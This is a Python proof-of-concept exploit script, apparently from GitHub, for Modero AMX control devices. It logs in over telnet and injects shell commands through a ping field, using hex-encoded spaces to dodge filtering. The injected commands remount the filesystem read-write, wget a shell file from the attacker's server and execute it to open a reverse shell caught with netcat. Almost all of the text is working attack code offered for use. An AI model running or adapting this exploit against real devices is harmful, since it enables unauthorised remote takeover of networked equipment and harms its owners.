README.md
Rendering markdown...
import time
import telnetlib
import argparse
parser = argparse.ArgumentParser(description='Reverse Shell POC for Modero AMX devices by @Insecurities on Github')
parser.add_argument('-t','--target', help='IP address of the AMX server', required=True)
parser.add_argument('-fs','--fileserver', help='Server where your Shell file will be hosted (i.e 192.168.0.2)', required=True)
parser.add_argument('-fn','--filename', help='name of the shell file hosted on your server', required=True)
parser.add_argument('-v','--verbose',help='Verbosity of the Telnet session, default = 0, use -v 1 for more verbose output', required=False,default=0,type=int, choices=[1,0])
args = parser.parse_args()
def telnet():
print("[*] RUNNING")
tn = telnetlib.Telnet("%s"% args.target)
tn.set_debuglevel(args.verbose)
#sleeps to give Telnet some time to exist
time.sleep(5)
print(tn.read_until(b">", 2))
#First command, sets the system to allow read/write.
raw = b"ping ;CMD=$'\\x20-o\\x20remount,rw\\x20/'&&mount$CMD\r\n"
tn.write(raw)
tn.read_until(b">",2)
#Downloads the file
print("taking a snooze")
time.sleep(10)
raw = b"ping ;CMD=$'\\x20http://"+args.fileserver.encode('ascii') +b"/"+args.filename.encode('ascii')+b"'&&wget$CMD\r\n"
tn.write(raw)
#Executes the file
print("taking a snooze")
time.sleep(10)
raw = b"ping ;CMD=$'\\x20"+args.filename.encode('ascii')+b"'&&/bin/sh$CMD\r\n"
tn.write(raw)
print(tn.read_until(b">",2))
print("Shell should have caught, check yer netcat")
time.sleep(2)
print("exiting!")
tn.close
def confirmStart():
print("[!] Your current settings are:")
print("[*] Target: %s" % args.target)
print("[*] FileServer and Filename URL: http://%s/%s" %(args.fileserver,args.filename))
print("[*] Verbosity: %r" % args.verbose)
confirmation = input("(^_^)7 Continue? (Y/N): ").upper()
if confirmation == "Y":
telnet()
elif confirmation == "N":
print("See ya later")
exit()
else:
print("[!] INVALID OPTION - Please enter Y or N:")
time.sleep(1)
confirmStart()
confirmStart()